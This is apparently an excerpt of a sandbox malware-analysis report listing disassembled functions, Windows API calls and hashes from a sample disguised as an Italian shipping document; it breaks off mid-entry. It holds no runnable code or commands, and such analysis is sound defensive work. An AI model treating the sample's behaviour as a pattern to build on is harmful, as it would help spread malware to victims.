                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                        • String ID:
                        • API String ID: 3632110297-0
                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                        Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Destroy$DeleteMenuObject$IconWindow
                        • String ID:
                        • API String ID: 752480666-0
                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                        Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                        • String ID:
                        • API String ID: 3275902921-0
                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                        Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                        • String ID:
                        • API String ID: 3275902921-0
                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                        Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                        Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32 ref: 004555C7
                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                        • String ID:
                        • API String ID: 3691411573-0
                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                        Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                        • LineTo.GDI32(?,?,?), ref: 004472AC
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                        • LineTo.GDI32(?,?,?), ref: 004472C6
                        • EndPath.GDI32(?), ref: 004472D6
                        • StrokePath.GDI32(?), ref: 004472E4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                        • String ID:
                        • API String ID: 372113273-0
                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                        Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 0044CC6D
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                        Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 0041708E
                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                        • __amsg_exit.LIBCMT ref: 004170AE
                        • __lock.LIBCMT ref: 004170BE
                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                        • _free.LIBCMT ref: 004170EE
                        • InterlockedIncrement.KERNEL32(02EE2D10), ref: 00417106
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 3470314060-0
                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                        Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                        Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                        Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                        Download Yara Rule
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                        • ExitThread.KERNEL32 ref: 004151ED
                        • __freefls@4.LIBCMT ref: 00415209
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                        • String ID:
                        • API String ID: 442100245-0
                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                        Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                        • _wcslen.LIBCMT ref: 0045F94A
                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                        • String ID: 0
                        • API String ID: 621800784-4108050209
                        • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                        • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                        Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • SetErrorMode.KERNEL32 ref: 004781CE
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • SetErrorMode.KERNEL32(?), ref: 00478270
                        • SetErrorMode.KERNEL32(?), ref: 00478340
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                        • String ID: \VH
                        • API String ID: 3884216118-234962358
                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                        Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                        • IsMenu.USER32(?), ref: 0044854D
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                        • DrawMenuBar.USER32 ref: 004485AF
                        Strings
                        Memory Dump Source
